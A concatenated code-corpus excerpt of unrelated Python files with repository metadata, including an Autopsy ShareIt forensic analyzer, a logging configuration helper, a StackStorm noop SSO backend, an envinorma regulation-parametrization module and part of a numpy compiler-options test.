    """

    def __init__(self):
        # Per-class logger plus constants identifying the app package and
        # the artifact labels used for everything this analyzer creates.
        self._logger = Logger.getLogger(self.__class__.__name__)
        self._PACKAGE_NAME = "com.lenovo.anyshare.gps"
        self._MODULE_NAME = "ShareIt Analyzer"
        self._MESSAGE_TYPE = "ShareIt Message"
        self._VERSION = "5.0.28_ww"

    def analyze(self, dataSource, fileManager, context):
        """Locate every history.db owned by the ShareIt package, turn each
        transfer record into a message artifact with the transferred file
        attached, and log (rather than propagate) per-database failures."""
        historyDbs = AppSQLiteDB.findAppDatabases(dataSource, "history.db", True, self._PACKAGE_NAME)
        for historyDb in historyDbs:
            try:
                current_case = Case.getCurrentCaseThrows()
                historyDbHelper = CommunicationArtifactsHelper(current_case.getSleuthkitCase(),
                                                    self._MODULE_NAME, historyDb.getDBFile(),
                                                    Account.Type.SHAREIT)
                queryString = """
                            SELECT history_type, device_id, device_name, description, timestamp, file_path
                            FROM history
                            JOIN item where history.content_id = item.item_id
                            """
                historyResultSet = historyDb.runQuery(queryString)
                if historyResultSet is not None:
                    while historyResultSet.next():
                        direction = ""
                        fromId = None
                        toId = None
                        fileAttachments = ArrayList()
                        # history_type == 1 marks a received transfer; any
                        # other value is treated as sent. The peer device_id
                        # becomes the sender or recipient accordingly.
                        if (historyResultSet.getInt("history_type") == 1):
                            direction = CommunicationDirection.INCOMING
                            fromId = historyResultSet.getString("device_id")
                        else:
                            direction = CommunicationDirection.OUTGOING
                            toId = historyResultSet.getString("device_id")
                        # Presumably stored in milliseconds; convert to
                        # seconds for the artifact helper — TODO confirm.
                        timeStamp = historyResultSet.getLong("timestamp") / 1000
                        messageArtifact = historyDbHelper.addMessage(
                                                            self._MESSAGE_TYPE,
                                                            direction,
                                                            fromId,
                                                            toId,
                                                            timeStamp,
                                                            MessageReadStatus.UNKNOWN,
                                                            None,   # subject
                                                            None,   # message text
                                                            None )  # thread id

                        # add the file as attachment
                        fileAttachments.add(FileAttachment(current_case.getSleuthkitCase(), historyDb.getDBFile().getDataSource(), historyResultSet.getString("file_path")))
                        messageAttachments = MessageAttachments(fileAttachments, [])
                        historyDbHelper.addAttachments(messageArtifact, messageAttachments)

            except SQLException as ex:
                self._logger.log(Level.WARNING, "Error processing query result for ShareIt history.", ex)
                self._logger.log(Level.SEVERE, traceback.format_exc())
            except TskCoreException as ex:
                self._logger.log(Level.SEVERE, "Failed to create ShareIt message artifacts.", ex)
                self._logger.log(Level.SEVERE, traceback.format_exc())
            except BlackboardException as ex:
                self._logger.log(Level.WARNING, "Failed to post artifacts.", ex)
                self._logger.log(Level.WARNING, traceback.format_exc())
            except NoCurrentCaseException as ex:
                self._logger.log(Level.WARNING, "No case currently open.", ex)
                self._logger.log(Level.WARNING, traceback.format_exc())
            finally:
                # Always release the extracted database, even on failure.
                historyDb.close()
| 48.751724 | 172 | 0.606592 |
201c3ff46ed39f9d31b9bd6af4988cd2d18f6c06 | 1,342 | py | Python | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | 2 | 2021-05-29T06:57:24.000Z | 2021-06-15T09:13:38.000Z | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | null | null | null | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | null | null | null | import os
import logging
import logging.config
def logging_config(log_dir=None, log_file_path=None):
config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "[%(asctime)s][%(name)s][%(funcName)s][%(levelname)s] %(message)s"
},
"simple": {
"format": "[%(asctime)s] %(message)s"
},
},
"handlers": {
"terminal": {
"level": "INFO",
"formatter": "standard",
"class": "logging.StreamHandler",
}
},
"loggers": {
},
"root": {
"handlers": ["terminal"],
"level": "INFO",
}
}
if log_dir or log_file_path:
log_file_path = log_file_path or os.path.join(log_dir, "output.log")
if not os.path.exists(os.path.dirname(log_file_path)):
os.makedirs(os.path.dirname(log_file_path))
config["handlers"]["file"] = {
"level": "INFO",
"formatter": "standard",
"class": "logging.FileHandler",
"filename": log_file_path,
"mode": "a+",
}
config["root"]["handlers"].append("file")
logging.config.dictConfig(config)
| 26.313725 | 92 | 0.469449 |
e45d3e79a872ae3aa196646253da1ec27a9062da | 1,512 | py | Python | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
iEngage 2.0 API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import iengage_client
from iengage_client.rest import ApiException
from iengage_client.models.content_disposition import ContentDisposition
class TestContentDisposition(unittest.TestCase):
    """Unit test stubs for the generated ContentDisposition model."""
    def setUp(self):
        # No fixtures required: the stub only checks that the model instantiates.
        pass
    def tearDown(self):
        pass
    def testContentDisposition(self):
        """
        Smoke-test: ContentDisposition can be constructed with default arguments.
        """
        model = iengage_client.models.content_disposition.ContentDisposition()
if __name__ == '__main__':
    unittest.main()
6cacb5e7e9fa029588bd6a246876de5b05639229 | 1,214 | py | Python | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | null | null | null | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | 15 | 2021-02-11T22:58:54.000Z | 2021-08-06T18:03:47.000Z | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | 1 | 2021-07-10T15:02:29.000Z | 2021-07-10T15:02:29.000Z | # Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2auth.sso.base import BaseSingleSignOnBackend
__all__ = [
    'NoOpSingleSignOnBackend'
]
# Message raised verbatim by every method of the noop backend below.
NOT_IMPLEMENTED_MESSAGE = (
    'The default "noop" SSO backend is not a proper implementation. '
    'Please refer to the enterprise version for configuring SSO.'
)
class NoOpSingleSignOnBackend(BaseSingleSignOnBackend):
    """
    NoOp SSO authentication backend.

    Placeholder implementation: both backend hooks unconditionally raise
    NotImplementedError with NOT_IMPLEMENTED_MESSAGE.
    """
    def get_request_redirect_url(self, referer):
        raise NotImplementedError(NOT_IMPLEMENTED_MESSAGE)
    def verify_response(self, response):
        raise NotImplementedError(NOT_IMPLEMENTED_MESSAGE)
fe74c915ed9225b787129d41b8deeb08929b80b7 | 10,524 | py | Python | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 4 | 2020-12-11T09:40:12.000Z | 2022-03-08T13:43:35.000Z | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 104 | 2020-12-10T15:20:13.000Z | 2021-09-30T13:05:00.000Z | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | null | null | null | from copy import copy
from dataclasses import dataclass, replace
from typing import Any, Dict, List, Optional, Tuple, Union
from envinorma.models import ArreteMinisteriel, Regime
from envinorma.models.arrete_ministeriel import AMApplicability
from envinorma.models.condition import AndCondition, Condition, Greater, Littler, OrCondition, Range
from envinorma.models.parameter import Parameter, ParameterEnum
from envinorma.models.structured_text import (
Applicability,
PotentialInapplicability,
PotentialModification,
SectionParametrization,
StructuredText,
)
from .models.parametrization import Parametrization
from .natural_language_warnings import (
generate_inactive_warning,
generate_modification_warning,
generate_warning_missing_value,
)
from .tie_parametrization import add_parametrization
def _build_alternative_text(
    text: StructuredText, modification: PotentialModification, parameter_values: Dict[Parameter, Any]
) -> StructuredText:
    """Return the alternative version of *text*, flagged as a modification.

    The returned text keeps a pointer to the original version and carries a
    human-readable warning explaining which condition triggered the change.
    """
    warning = generate_modification_warning(modification.condition, parameter_values)
    alternative = copy(modification.new_version)
    alternative.applicability = Applicability(modified=True, warnings=[warning], previous_version=text)
    return alternative
def _has_undefined_parameters(condition: Condition, parameter_values: Dict[Parameter, Any]) -> bool:
    """True when *condition* references at least one parameter missing from *parameter_values*."""
    return any(parameter not in parameter_values for parameter in condition.parameters())
# Either kind of parametrized change that can be attached to a section.
_SectionParameter = Union[PotentialInapplicability, PotentialModification]
def _compute_warnings(
    parameter: _SectionParameter, parameter_values: Dict[Parameter, Any], whole_text: bool
) -> List[str]:
    """Return a "missing parameter value" warning if *parameter*'s condition cannot be evaluated.

    Returns an empty list when every parameter of the condition has a value.
    """
    if not _has_undefined_parameters(parameter.condition, parameter_values):
        return []
    is_modification = isinstance(parameter, PotentialModification)
    # Only inapplicabilities carry a target list of alineas.
    alineas = None if is_modification else parameter.alineas
    return [
        generate_warning_missing_value(
            parameter.condition, parameter_values, alineas, is_modification, whole_text
        )
    ]
def _keep_satisfied_conditions(
    inapplicable_sections: List[PotentialInapplicability], parameter_values: Dict[Parameter, Any], whole_text: bool
) -> Tuple[List[PotentialInapplicability], List[str]]:
    """Split potential inapplicabilities into satisfied ones and warnings.

    Returns ``(satisfied, warnings)``: *satisfied* contains the entries whose
    condition holds for *parameter_values*; *warnings* collects a "missing
    value" message for each unsatisfied condition that could not be fully
    evaluated.
    """
    satisfied: List[PotentialInapplicability] = []
    warnings: List[str] = []
    for inapplicable_section in inapplicable_sections:
        if inapplicable_section.condition.is_satisfied(parameter_values):
            satisfied.append(inapplicable_section)
        else:
            # Accumulate: the previous version reassigned `warnings`, so only
            # the warnings of the LAST unsatisfied condition survived.
            warnings.extend(_compute_warnings(inapplicable_section, parameter_values, whole_text))
    return satisfied, warnings
def _keep_satisfied_mofications(
    alternative_sections: List[PotentialModification], parameter_values: Dict[Parameter, Any]
) -> Tuple[List[PotentialModification], List[str]]:
    """Split potential modifications into satisfied ones and warnings.

    (Name typo "mofications" kept: callers elsewhere in this module use it.)
    Returns ``(satisfied, warnings)`` analogous to _keep_satisfied_conditions.
    """
    satisfied: List[PotentialModification] = []
    warnings: List[str] = []
    for alt in alternative_sections:
        if alt.condition.is_satisfied(parameter_values):
            satisfied.append(alt)
        else:
            # Accumulate instead of overwriting (same defect as in
            # _keep_satisfied_conditions: only the last warning list was kept).
            warnings.extend(_compute_warnings(alt, parameter_values, False))
    return satisfied, warnings
def _deactivate_child_section(section: StructuredText, all_inactive: bool) -> StructuredText:
    """Recursively propagate (in)activity to *section*, its alineas and descendants.

    Alineas are always flagged inactive; the section-level ``active`` flag is
    the negation of *all_inactive*.
    """
    section = copy(section)
    if section.applicability:
        section.applicability.active = not all_inactive
    else:
        section.applicability = Applicability(active=not all_inactive)
    section.sections = [_deactivate_child_section(child, all_inactive) for child in section.sections]
    section.outer_alineas = [replace(alinea, inactive=True) for alinea in section.outer_alineas]
    return section
def _deactivate_alineas(
    text: StructuredText, inapplicability: PotentialInapplicability, parameter_values: Dict[Parameter, Any]
) -> StructuredText:
    """Apply a satisfied inapplicability to *text*.

    Deactivates either the targeted alineas or, when ``alineas`` is None, the
    whole section; optionally cascades to subsections.
    """
    text = copy(text)
    targeted = inapplicability.alineas
    deactivate_everything = targeted is None
    warning = generate_inactive_warning(
        inapplicability.condition, parameter_values, all_alineas=deactivate_everything, whole_text=False
    )
    if deactivate_everything:
        new_alineas = [replace(alinea, inactive=True) for alinea in text.outer_alineas]
    else:
        targeted_set = set(targeted)
        new_alineas = [
            replace(alinea, inactive=index in targeted_set) for index, alinea in enumerate(text.outer_alineas)
        ]
    text.applicability = Applicability(active=not deactivate_everything, warnings=[warning])
    if inapplicability.subsections_are_inapplicable:
        text.sections = [_deactivate_child_section(child, all_inactive=deactivate_everything) for child in text.sections]
    text.outer_alineas = new_alineas
    return text
def _apply_satisfied_modificators(
    text: StructuredText,
    inapplicabilities: List[PotentialInapplicability],
    modifications: List[PotentialModification],
    parameter_values: Dict[Parameter, Any],
) -> StructuredText:
    """Apply the (at most one) satisfied modificator to *text*.

    Exactly one of *inapplicabilities* / *modifications* may be non-empty, and
    with at most one element; otherwise an error is raised. Returns *text*
    unchanged when both lists are empty.
    """
    # Mixing a modification with an inapplicability on one section is not supported.
    if inapplicabilities and modifications:
        raise NotImplementedError(
            f'Cannot handle inapplicability and modification on one section. (Section title: {text.title.text})\n'
            f'Inapplicability condition: {inapplicabilities[0].condition}\n'
            f'Modification condition: {modifications[0].condition}\n'
        )
    if modifications:
        if len(modifications) > 1:
            raise ValueError(
                f'Cannot handle more than 1 applicable modification on one section. '
                f'Here, {len(modifications)} are applicable.'
            )
        return _build_alternative_text(text, modifications[0], parameter_values)
    if inapplicabilities:
        if len(inapplicabilities) > 1:
            raise ValueError(
                f'Cannot handle more than 1 non-applicability conditions on one section. '
                f'Here, {len(inapplicabilities)} conditions are applicable.'
                f'\n{parameter_values}\n{text}'
            )
        return _deactivate_alineas(text, inapplicabilities[0], parameter_values)
    return text
def _ensure_applicabiliy(candidate: Any) -> Applicability:
    """Narrow *candidate* to Applicability or raise. (Name typo kept for compatibility.)"""
    if isinstance(candidate, Applicability):
        return candidate
    raise ValueError(f'Unexpected type {type(candidate)}')
def _extract_satisfied_objects_and_warnings(
    parametrization: SectionParametrization, parameter_values: Dict[Parameter, Any]
) -> Tuple[List[PotentialInapplicability], List[PotentialModification], List[str]]:
    """Evaluate a section's parametrization against the known parameter values.

    Returns the satisfied inapplicabilities, the satisfied modifications, and a
    sorted list of all warnings (including the static warnings attached to the
    parametrization itself).
    """
    inapplicabilities, inapplicability_warnings = _keep_satisfied_conditions(
        parametrization.potential_inapplicabilities, parameter_values, whole_text=False
    )
    modifications, modification_warnings = _keep_satisfied_mofications(
        parametrization.potential_modifications, parameter_values
    )
    every_warning = inapplicability_warnings + modification_warnings + parametrization.warnings
    return inapplicabilities, modifications, sorted(every_warning)
def _apply_parameter_values_in_text(text: StructuredText, parameter_values: Dict[Parameter, Any]) -> StructuredText:
    """Recursively specialize *text* for *parameter_values*.

    When no modificator is satisfied at this level, recurse into subsections;
    otherwise apply the satisfied modificator to this section (the recursion
    stops there). Warnings from both paths are merged, deduplicated and sorted.
    """
    na_conditions, modifications, warnings = _extract_satisfied_objects_and_warnings(
        text.parametrization, parameter_values
    )
    text = copy(text)
    if not na_conditions and not modifications:
        text.sections = [_apply_parameter_values_in_text(section, parameter_values) for section in text.sections]
        text.applicability = Applicability()
    else:
        text = _apply_satisfied_modificators(text, na_conditions, modifications, parameter_values)
    # Merge condition-evaluation warnings with whatever the modificator set.
    all_warnings = sorted(set(_ensure_applicabiliy(text.applicability).warnings + warnings))
    text.applicability = replace(_ensure_applicabiliy(text.applicability), warnings=all_warnings)
    return text
def _generate_whole_text_reason_inactive(condition: Condition, parameter_values: Dict[Parameter, Any]) -> str:
    """Build the warning explaining why the entire text is inapplicable."""
    return generate_inactive_warning(condition, parameter_values, all_alineas=True, whole_text=True)
def _compute_whole_text_applicability(
    applicability: AMApplicability, parameter_values: Dict[Parameter, Any]
) -> Tuple[bool, List[str]]:
    """Decide whether the whole AM applies for *parameter_values*.

    Returns ``(applicable, warnings)``. The text is inapplicable only when an
    inapplicability condition exists and is satisfied. If the condition exists
    but cannot be fully evaluated, the text stays applicable and a "missing
    value" warning is added.
    """
    condition = applicability.condition_of_inapplicability
    if not condition:
        return True, applicability.warnings
    if condition.is_satisfied(parameter_values):
        return False, [_generate_whole_text_reason_inactive(condition, parameter_values)]
    # Copy before appending: the previous version appended to
    # applicability.warnings in place, so repeated calls accumulated duplicate
    # warnings on the input object.
    warnings = list(applicability.warnings)
    if _has_undefined_parameters(condition, parameter_values):
        warnings.append(generate_warning_missing_value(condition, parameter_values, None, False, True))
    return True, warnings
def _is_satisfiable(condition: Condition, regime_target: Regime) -> bool:
    """Can *condition* hold for an installation classified under *regime_target*?

    Recurses through and/or combinators; any non-regime leaf condition is
    considered satisfiable.
    """
    if isinstance(condition, AndCondition):
        return all(_is_satisfiable(child, regime_target) for child in condition.conditions)
    if isinstance(condition, OrCondition):
        return any(_is_satisfiable(child, regime_target) for child in condition.conditions)
    if condition.parameter != ParameterEnum.REGIME.value:
        return True
    # Regime is a categorical parameter: ordered comparisons make no sense.
    if isinstance(condition, (Range, Littler, Greater)):
        raise ValueError('Cannot have Range, Littler or Greater condition for Regime parameter.')
    return regime_target == condition.target
def apply_parameter_values_to_am(
    am: ArreteMinisteriel, parameter_values: Dict[Parameter, Any], parametrization: Optional[Parametrization] = None
) -> ArreteMinisteriel:
    """Return a copy of *am* whose sections are specialized for *parameter_values*.

    When *parametrization* is given it is first tied to *am*; note that this
    step happens before the copy and therefore touches the input object.
    """
    if parametrization:
        add_parametrization(am, parametrization)
    specialized = copy(am)
    specialized.sections = [
        _apply_parameter_values_in_text(section, parameter_values) for section in specialized.sections
    ]
    return specialized
@dataclass
class AMWithApplicability:
    """An arrêté ministériel bundled with its whole-text applicability verdict."""
    # The (possibly parametrized) text itself.
    arrete: ArreteMinisteriel
    # Whether the whole text applies for the evaluated parameter values.
    applicable: bool
    # Human-readable warnings gathered while evaluating applicability.
    warnings: List[str]
    @classmethod
    def from_dict(cls, dict_: Dict[str, Any]) -> 'AMWithApplicability':
        # Note the key asymmetry: the `arrete` field is serialized under 'am'.
        return cls(
            arrete=ArreteMinisteriel.from_dict(dict_['am']), applicable=dict_['applicable'], warnings=dict_['warnings']
        )
    def to_dict(self) -> Dict[str, Any]:
        return {'am': self.arrete.to_dict(), 'applicable': self.applicable, 'warnings': self.warnings}
def build_am_with_applicability(
    am: ArreteMinisteriel, parametrization: Optional[Parametrization], parameter_values: Dict[Parameter, Any]
) -> AMWithApplicability:
    """Bundle the parametrized *am* with its whole-text applicability and warnings."""
    if parametrization:
        add_parametrization(am, parametrization)
    applicable, warnings = _compute_whole_text_applicability(am.applicability, parameter_values)
    arrete = apply_parameter_values_to_am(am, parameter_values)
    return AMWithApplicability(arrete=arrete, applicable=applicable, warnings=warnings)
| 42.26506 | 120 | 0.750665 |
5f3ca9e85131975ec8930565d53fdc7fefca8a20 | 463 | py | Python | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | class Customer:
customer_id = 0
def __init__(self, name, address, email):
Customer.customer_id += Customer.get_next_id()
self.name = name
self.address = address
self.email = email
self.id = Customer.customer_id
def __repr__(self):
return f"Customer <{self.id}> {self.name}; Address: {self.address}; Email: {self.email}"
@staticmethod
def get_next_id():
return Customer.customer_id + 1 | 28.9375 | 96 | 0.62851 |
a1b4e3fb9ddeb269f69286ed500a6798491a2380 | 140 | py | Python | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-utils | 6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3 | [
"Apache-1.1"
] | 1 | 2022-03-31T05:17:59.000Z | 2022-03-31T05:17:59.000Z | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-prettyprintobj | e9af7470abc59458a12282dd96735002a7c0d9dc | [
"Apache-1.1"
] | null | null | null | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-prettyprintobj | e9af7470abc59458a12282dd96735002a7c0d9dc | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python3
import jk_utils
d = jk_utils.ip.LocalIPAddressDetector(["eth*", "wlan*"])
for x in d.getIPAddresses():
print(x)
| 10 | 57 | 0.671429 |
d076ff5841aa706f44a553b58e7f60d4f8758866 | 855 | py | Python | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 154 | 2015-08-14T03:28:16.000Z | 2022-03-19T00:06:38.000Z | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 59 | 2015-08-30T23:17:33.000Z | 2019-06-12T09:20:57.000Z | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 44 | 2015-09-19T13:02:07.000Z | 2022-03-19T00:14:11.000Z | #
# eChronos Real-Time Operating System
# Copyright (c) 2017, Commonwealth Scientific and Industrial Research
# Organisation (CSIRO) ABN 41 687 119 230.
#
# All rights reserved. CSIRO is willing to grant you a licence to the eChronos
# real-time operating system under the terms of the CSIRO_BSD_MIT license. See
# the file "LICENSE_CSIRO_BSD_MIT.txt" for details.
#
# @TAG(CSIRO_BSD_MIT)
#
from prj import execute, SystemBuildError
def system_build(output_file, modules, include_paths=None):
    """Compile and link every module's C files into *output_file* with gcc.

    include_paths: optional list of extra header search directories.
    Raises SystemBuildError when the modules contribute no C files at all.
    """
    include_flags = ['-I%s' % inc for inc in (include_paths or [])]
    c_files = [c_file for module in modules for c_file in module.c_files()]
    if not c_files:
        raise SystemBuildError("Zero C files in system definition")
    execute(['gcc', '-o', output_file, '-Wall'] + include_flags + c_files)
ce067bc56466c6b97df47514925f0894a5fbc3bf | 474 | py | Python | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
"MIT"
] | null | null | null | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
"MIT"
] | null | null | null | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from profiles_api import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, basename='hello-viewset')
router.register('profile', views.UserProfileViewSet)
router.register('feed', views.ProfileFeedItemViewSet)
urlpatterns = [
path('hello-view/', views.HelloApiView.as_view()),
path('login/', views.UserLoginApiView.as_view()),
] + router.urls
| 29.625 | 78 | 0.776371 |
1be1533dde190bf2f12e1bb737dcf9a782ee468f | 1,845 | py | Python | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | # To use a consistent encoding
from codecs import open
from os import path
from setuptools import setup
HERE = path.abspath(path.dirname(__file__))
# Get version info
ABOUT = {}
with open(path.join(HERE, "datadog_checks", "haproxy", "__about__.py")) as f:
exec(f.read(), ABOUT)
# Get the long description from the README file
with open(path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def get_dependencies():
dep_file = path.join(HERE, 'requirements.in')
if not path.isfile(dep_file):
return []
with open(dep_file, encoding='utf-8') as f:
return f.readlines()
CHECKS_BASE_REQ = 'datadog-checks-base>=11.0.0'
setup(
name='datadog-haproxy',
version=ABOUT["__version__"],
description='The HAProxy check',
long_description=long_description,
long_description_content_type='text/markdown',
keywords='datadog agent haproxy check',
# The project's main homepage.
url='https://github.com/DataDog/integrations-core',
# Author details
author='Datadog',
author_email='packages@datadoghq.com',
# License
license='BSD',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Topic :: System :: Monitoring',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
],
# The package we're going to ship
packages=['datadog_checks.haproxy'],
# Run-time dependencies
install_requires=[CHECKS_BASE_REQ],
extras_require={'deps': get_dependencies()},
# Extra files to ship with the wheel package
include_package_data=True,
)
| 29.758065 | 77 | 0.674255 |
244748e5889af6bf955d242e0aecf1064896c487 | 6,308 | py | Python | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 3 | 2021-02-06T06:47:30.000Z | 2021-08-11T10:05:27.000Z | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 169 | 2020-12-25T07:10:57.000Z | 2022-03-29T22:12:31.000Z | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 1 | 2021-04-17T03:10:32.000Z | 2021-04-17T03:10:32.000Z | import unittest
from os import sys, path
is_standalone = __name__ == '__main__' and __package__ is None
if is_standalone:
sys.path.append(path.abspath(path.join(path.dirname(__file__), "..")))
from ccompiler_opt import CCompilerOpt
else:
from numpy.distutils.ccompiler_opt import CCompilerOpt
# Compilers exercised per target architecture.
# NOTE(review): 'narch' presumably means "no specific architecture" — confirm
# against ccompiler_opt's dist_info() parsing before relying on it.
arch_compilers = dict(
    x86 = ("gcc", "clang", "icc", "iccw", "msvc"),
    x64 = ("gcc", "clang", "icc", "iccw", "msvc"),
    ppc64 = ("gcc", "clang"),
    ppc64le = ("gcc", "clang"),
    armhf = ("gcc", "clang"),
    aarch64 = ("gcc", "clang"),
    narch = ("gcc",)
)
class FakeCCompilerOpt(CCompilerOpt):
    """CCompilerOpt stub that requires no real distutils compiler object."""
    # Value returned by dist_info(); tests set it to arch + compiler name.
    fake_info = ""
    def __init__(self, *args, **kwargs):
        # Pass None in place of the distutils ccompiler instance.
        CCompilerOpt.__init__(self, None, **kwargs)
    def dist_compile(self, sources, flags, **kwargs):
        # Pretend compilation succeeded by echoing the sources back.
        return sources
    def dist_info(self):
        return FakeCCompilerOpt.fake_info
    @staticmethod
    def dist_log(*args, stderr=False):
        # Silence all logging during the tests.
        pass
class _TestConfFeatures(FakeCCompilerOpt):
    """A hook to check the sanity of configured features
    - before it is called by the abstract class '_Feature'
    """
    def conf_features_partial(self):
        """Validate both the full and the partial feature configuration."""
        conf_all = self.conf_features
        for feature_name, feature in conf_all.items():
            self.test_feature(
                "attribute conf_features",
                conf_all, feature_name, feature
            )
        conf_partial = FakeCCompilerOpt.conf_features_partial(self)
        for feature_name, feature in conf_partial.items():
            self.test_feature(
                "conf_features_partial()",
                conf_partial, feature_name, feature
            )
        return conf_partial
    def test_feature(self, log, search_in, feature_name, feature_dict):
        """Run every sanity check on a single feature entry."""
        error_msg = (
            "during validate '{}' within feature '{}', "
            "march '{}' and compiler '{}'\n>> "
        ).format(log, feature_name, self.cc_march, self.cc_name)
        if not feature_name.isupper():
            raise AssertionError(error_msg + "feature name must be in uppercase")
        for option, val in feature_dict.items():
            self.test_option_types(error_msg, option, val)
            self.test_duplicates(error_msg, option, val)
        self.test_implies(error_msg, search_in, feature_name, feature_dict)
        self.test_group(error_msg, search_in, feature_name, feature_dict)
        self.test_extra_checks(error_msg, search_in, feature_name, feature_dict)
    def test_option_types(self, error_msg, option, val):
        """Check each option name is known and its value has the expected type."""
        for tp, available in (
            ((str, list), (
                "implies", "headers", "flags", "group", "detect", "extra_checks"
            )),
            ((str,), ("disable",)),
            ((int,), ("interest",)),
            ((bool,), ("implies_detect",)),
            ((bool, type(None)), ("autovec",)),
        ) :
            found_it = option in available
            if not found_it:
                continue
            if not isinstance(val, tp):
                error_tp = [t.__name__ for t in (*tp,)]
                error_tp = ' or '.join(error_tp)
                raise AssertionError(error_msg +
                    "expected '%s' type for option '%s' not '%s'" % (
                    error_tp, option, type(val).__name__
                ))
            break
        if not found_it:
            raise AssertionError(error_msg + "invalid option name '%s'" % option)
    def test_duplicates(self, error_msg, option, val):
        """Reject duplicated values in list-like options."""
        if option not in (
            "implies", "headers", "flags", "group", "detect", "extra_checks"
        ) : return
        if isinstance(val, str):
            val = val.split()
        if len(val) != len(set(val)):
            raise AssertionError(error_msg + "duplicated values in option '%s'" % option)
    def test_implies(self, error_msg, search_in, feature_name, feature_dict):
        """Every implied feature must exist, be enabled, and differ from the feature itself."""
        if feature_dict.get("disabled") is not None:
            return
        implies = feature_dict.get("implies", "")
